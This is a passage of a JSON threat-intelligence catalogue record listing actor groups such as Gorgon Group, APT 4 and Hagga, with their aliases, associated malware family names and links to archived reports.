"tools": [ "AgenTesla", "Agent Tesla", "AgentTesla", "Aggah", "Atros2.CKPN", "Bladabindi", "Jorik", "Nancrat", "NanoCore", "NanoCore RAT", "Negasteal", "Origin Logger", "Revenge RAT", "RevengeRAT", "Revetrat", "Warzone", "Warzone RAT", "ZPAQ", "Zurten", "njRAT" ], "source_id": "ETDA", "reports": null }, { "id": "18278778-fa63-4a9a-8988-4d266b8c5c1a", "created_at": "2023-01-06T13:46:38.769816Z", "updated_at": "2026-04-10T02:00:03.094179Z", "deleted_at": null, "main_name": "The Gorgon Group", "aliases": [ "Gorgon Group", "Subaat", "ATK92", "G0078", "Pasty Gemini" ], "source_name": "MISPGALAXY:The Gorgon Group", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "97fdaf9f-cae1-4ccc-abe2-76e5cbc0febd", "created_at": "2022-10-25T15:50:23.296989Z", "updated_at": "2026-04-10T02:00:05.347085Z", "deleted_at": null, "main_name": "Gorgon Group", "aliases": [ "Gorgon Group" ], "source_name": "MITRE:Gorgon Group", "tools": [ "NanoCore", "QuasarRAT", "Remcos", "njRAT" ], "source_id": "MITRE", "reports": null }, { "id": "6fbff48b-7a3e-4e54-ac22-b10f11e32337", "created_at": "2022-10-25T16:07:23.318008Z", "updated_at": "2026-04-10T02:00:04.539063Z", "deleted_at": null, "main_name": "APT 4", "aliases": [ "APT 4", "Bronze Edison", "Maverick Panda", "Salmon Typhoo", "Sodium", "Sykipot", "TG-0623", "Wisp Team" ], "source_name": "ETDA:APT 4", "tools": [ "Getkys", "Sykipot", "Wkysol", "XMRig" ], "source_id": "ETDA", "reports": null }, { "id": "28851008-77b4-47eb-abcd-1bb5b3f19fc2", "created_at": "2023-06-20T02:02:10.254614Z", "updated_at": "2026-04-10T02:00:03.365336Z", "deleted_at": null, "main_name": "Hagga", "aliases": [ "TH-157", "Aggah" ], "source_name": "MISPGALAXY:Hagga", "tools": [ "Agent Tesla" ], "source_id": "MISPGALAXY", "reports": null }, { "id": "6c4e4b91-1f98-49e2-90e6-435cea8d3d53", "created_at": "2022-10-25T16:07:23.693797Z", "updated_at": "2026-04-10T02:00:04.711987Z", "deleted_at": null, "main_name": "Gorgon Group", "aliases": [ "ATK 92", "G0078", "Pasty Draco", "Subaat", "TAG-CR5" ], "source_name": "ETDA:Gorgon Group", "tools": [ "AgenTesla", "Agent Tesla", "AgentTesla", "Atros2.CKPN", "Bladabindi", "CinaRAT", "Crimson RAT", "ForeIT", "Jorik", "LOLBAS", "LOLBins", "Living off the Land", "Loki", "Loki.Rat", "LokiBot", "LokiPWS", "MSIL", "MSIL/Crimson", "Nancrat", "NanoCore", "NanoCore RAT", "Negasteal", "NetWeird", "NetWire", "NetWire RAT", "NetWire RC", "NetWired RC", "Origin Logger", "Quasar RAT", "QuasarRAT", "Recam", "Remcos", "RemcosRAT", "Remvio", "Revenge RAT", "RevengeRAT", "Revetrat", "SEEDOOR", "Scarimson", "Socmer", "Yggdrasil", "ZPAQ", "Zurten", "njRAT" ], "source_id": "ETDA", "reports": null } ], "ts_created_at": 1775434492, "ts_updated_at": 1775826699, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/9e26b1f609bf14e037b4913faf1a26abd52850d1.pdf", "text": "https://archive.orkl.eu/9e26b1f609bf14e037b4913faf1a26abd52850d1.txt", "img": "https://archive.orkl.eu/9e26b1f609bf14e037b4913faf1a26abd52850d1.jpg" } }